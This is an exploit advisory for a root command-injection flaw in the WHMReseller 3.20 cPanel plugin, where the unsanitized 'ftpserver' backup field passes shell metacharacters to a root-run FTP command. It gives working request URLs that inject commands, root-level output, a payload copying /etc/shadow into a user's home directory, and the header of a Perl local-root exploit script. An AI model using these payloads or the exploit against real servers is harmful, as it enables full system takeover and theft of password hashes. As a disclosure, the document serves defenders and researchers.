WHMReseller 3.20 - resellers could execute commands as root



DESCRIPTION


The "ftpserver" variable in the FTP backup setting is unsanitized, allowing for metacharacters to be injected into the shell when the FTP backup is ran. Since the backups run as root, we can execute commands as root.



IMPACT


Full system compromise.


1. As a reseller, access the following URL:

https://example.com:2087/cgi/whmreseller/subreseller.cgi?action=backup&ftpsettings=yes&ftpserver=;/usr/bin/id|/usr/bin/wall;
&ftpuser=ftpuser&ftppass=ftppass&end=Save


2. Observe the "ftpserver" variable in your master reseller file, assuming your username is "alice":

[root@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller/mr]# grep -n ftp alice
22:ftpweeklyenabled=0
24:ftpserver=;/usr/bin/id|/usr/bin/wall;
25:ftpuser=ftpuser
26:ftppass=ftppass
27:ftpfiles=


Now we're going to initiate a backup for ourselves. WHMReseller is going to execute the command "/usr/bin/ftp -vu", and pass it the argument of the "ftpserver" variable. Thus, the full command it's going to execute will be:

/usr/bin/ftp -vu ;/usr/bin/id|/usr/bin/wall;


3. To start the backup process, access the following URL:

https://example.com:2087/cgi/whmreseller/subreseller.cgi?action=backup&ftpbackup=alice


After anywhere from a few seconds to a few minutes later, you will see the following in your console:

[user@host ~]$


Broadcast message from root (Mon Aug 25 15:40:09 2008):

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


Spaces can be used in the command, which can be represented by the "+" character. Thus, the following command:

;/bin/cat+/etc/shadow+>+/home/user/shadow;

would be the same as this:

cat /etc/shadow > ~/shadow


[user@host ~]$ head -15 whmreseller_local_root.pl
#!/usr/bin/perl

####################################################
#
#  WHMReseller 3.20
#  WHMReseller 3.211 (still not fixed)
#  WHMReseller 3.212 (still not fixed)
#  WHMReseller 3.214 (still not fixed)
#
#  $ ./whmreseller_local_root.pl
#  ............
#  sh-3.00# id
#  uid=0(root) gid=0(root)
#
####################################################